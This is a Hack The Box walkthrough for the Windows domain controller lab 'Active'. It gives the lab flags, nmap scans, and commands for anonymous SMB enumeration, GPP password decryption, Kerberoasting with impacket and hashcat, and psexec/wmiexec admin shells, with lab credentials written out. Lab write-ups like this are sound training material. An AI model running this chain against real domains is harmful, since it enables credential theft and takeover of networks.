## Hack the Box - Active ``` Machine IP: 10.10.10.100 User: 43c4ac25717a662efc45a37f8631dddf Root: c632b7cc9276812c85afabafe6182d94 ``` #### 1. NMAP (Surface) ```CSS # Nmap 7.93 scan initiated Tue Mar 28 13:13:14 2023 as: nmap -Pn -sS -p- -T4 --min-rate 1000 -oN nmap.surface 10.10.10.100 Nmap scan report for 10.10.10.100 Host is up (0.091s latency). Not shown: 65512 closed tcp ports (reset) PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5722/tcp open msdfsr 9389/tcp open adws 47001/tcp open winrm 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49157/tcp open unknown 49158/tcp open unknown 49165/tcp open unknown 49171/tcp open unknown 49177/tcp open unknown # Nmap done at Tue Mar 28 13:14:19 2023 -- 1 IP address (1 host up) scanned in 65.05 seconds ``` #### 2. NMAP (Deep) ```CSS # Nmap 7.93 scan initiated Tue Mar 28 13:17:30 2023 as: nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49171,49177 -oN nmap.deep 10.10.10.100 Nmap scan report for 10.10.10.100 Host is up (0.087s latency). PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-03-28 07:47:37Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5722/tcp open msrpc Microsoft Windows RPC 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC 49165/tcp open msrpc Microsoft Windows RPC 49171/tcp open msrpc Microsoft Windows RPC 49177/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 210: |_ Message signing enabled and required | smb2-time: | date: 2023-03-28T07:48:33 |_ start_date: 2023-03-28T07:38:38 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Mar 28 13:18:43 2023 -- 1 IP address (1 host up) scanned in 72.55 seconds ``` --- #### 3. SMBmap/ SMBclient (II Methods) ##### Method I ```CSS ▶ smbmap -H 10.10.10.100 ``` - Using the above command `smbmap` wil try access file shares and list them out which are accessible via "anonymous" login. ![image](https://user-images.githubusercontent.com/83878909/228279272-d8531119-1230-4bd1-9a9f-d7bbde5a4c4e.png) ##### Method II ```CSS ▶ smbclient -L //10.10.10.100 ``` - Using the above command `smbmap` wil try access file shares and list them out which are accessible via "anonymous" login. ![image](https://user-images.githubusercontent.com/83878909/228278975-a07028f8-f1c5-4486-8ca7-ce5f54f4c2d7.png) --- #### 4. SMBclient ```CSS ▶ smbclient //10.10.10.100/Replication -c 'recurse;ls' ``` - Using the above command `smbclient` will go through all the files present in the file shares and list them out. ![image](https://user-images.githubusercontent.com/83878909/228280988-fa36389b-3eda-4d64-97a9-899b97dd7fb9.png) ![image](https://user-images.githubusercontent.com/83878909/228281855-9259b198-3dd2-407a-b25b-00b23fbf4a83.png) --- #### 5. Credentials ```CSS ▶ smbclient //10.10.10.100/Replication ``` - Using `smbclient` login as an "anonymous" user and download the `Groups.xml` file. ![image](https://user-images.githubusercontent.com/83878909/228287259-11261de2-c4c2-44d8-a4ed-a44cbe89d76f.png) --- #### 6. Decrypt ```CSS ▶ gpp-decrypt {HASH} ``` - Decrypt the hash found in `Groups.xml` to obtain a clear text password. ![image](https://user-images.githubusercontent.com/83878909/228287533-95917512-20fd-46fb-a0af-14d50709215b.png) - Credentials: `svc_tgs : GPPstillStandingStrong2k18` - `TGS`: Ticket Granting Service --- #### 7. SMBmap ```CSS ▶ smbmap -u SVC_TGS -p GPPstillStandingStrong2k18 -H 10.10.10.100 ``` - Using `smbmap` with valid user credentials to check for file shares which were previously not accessible with "anonymous". ![image](https://user-images.githubusercontent.com/83878909/228297680-9b0378e2-905c-4647-b3f4-1bde845a69ea.png) #### 8. Extract SPNs and TGS Ticket ```CSS ▶ impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18 ``` - SPNs are used by services in an AD environment to identify themselves to the Kerberos authentication service. By extracting the SPNs associated with user accounts, attempt to leverage them to obtain Kerberos tickets. - This command specifically is used to retrieve Service Principal Names (SPNs) for user accounts that are used as service accounts and sends a request to the domain controller to obtain a TGS ticket (a.k.a TGT) for the `SVC_TGS` user account, which is used as a service account in the `active.htb` domain. ![image](https://user-images.githubusercontent.com/83878909/228320723-7f8d729a-b79a-43e0-8f22-8f95fadfcff5.png) --- #### 9. Crack Hash ```CSS ▶ hashcat -m 13100 ticket.hash /usr/share/wordlists/rockyou.txt ``` - Crack the hash to obtain a clear text password. ![image](https://user-images.githubusercontent.com/83878909/228336517-57048f34-213d-4463-9ae9-0331dcc8abd8.png) --- #### 10. SMBmap ```CSS ▶ smbmap -u Administrator -p Ticketmaster1968 -H 10.10.10.100 ``` - Using `smbmap` with found credentials of the user "Administrator" to check for file shares. ![image](https://user-images.githubusercontent.com/83878909/228337905-9238f25f-c1e0-4079-8367-fbfd9471e721.png) --- #### 11. PSexec/ WMIexec (II Methods) ##### Method I ```CSS ▶ impacket-psexec active.htb/Administrator@10.10.10.100 ``` - Using `impacket-psexec` to establish a connection to the remote machine, authenticate using the "Administrator" credentials, and then spawn a shell on the remote machine. ![image](https://user-images.githubusercontent.com/83878909/228338846-2fcf6515-8cb8-4eee-9d1c-e4a824d47af6.png) ##### Method II ```CSS ▶ impacket-wmiexec active.htb/administrator:Ticketmaster1968@10.10.10.100 ``` -Using `impacket-wmiexec` to spawn a shell on the remote machine using Windows Management Instrumentation (WMI) service. ![image](https://user-images.githubusercontent.com/83878909/228341228-e261a5cd-8023-4000-989b-25b8176331bf.png) --- ###### References: - [Group Policy Preferences](https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/)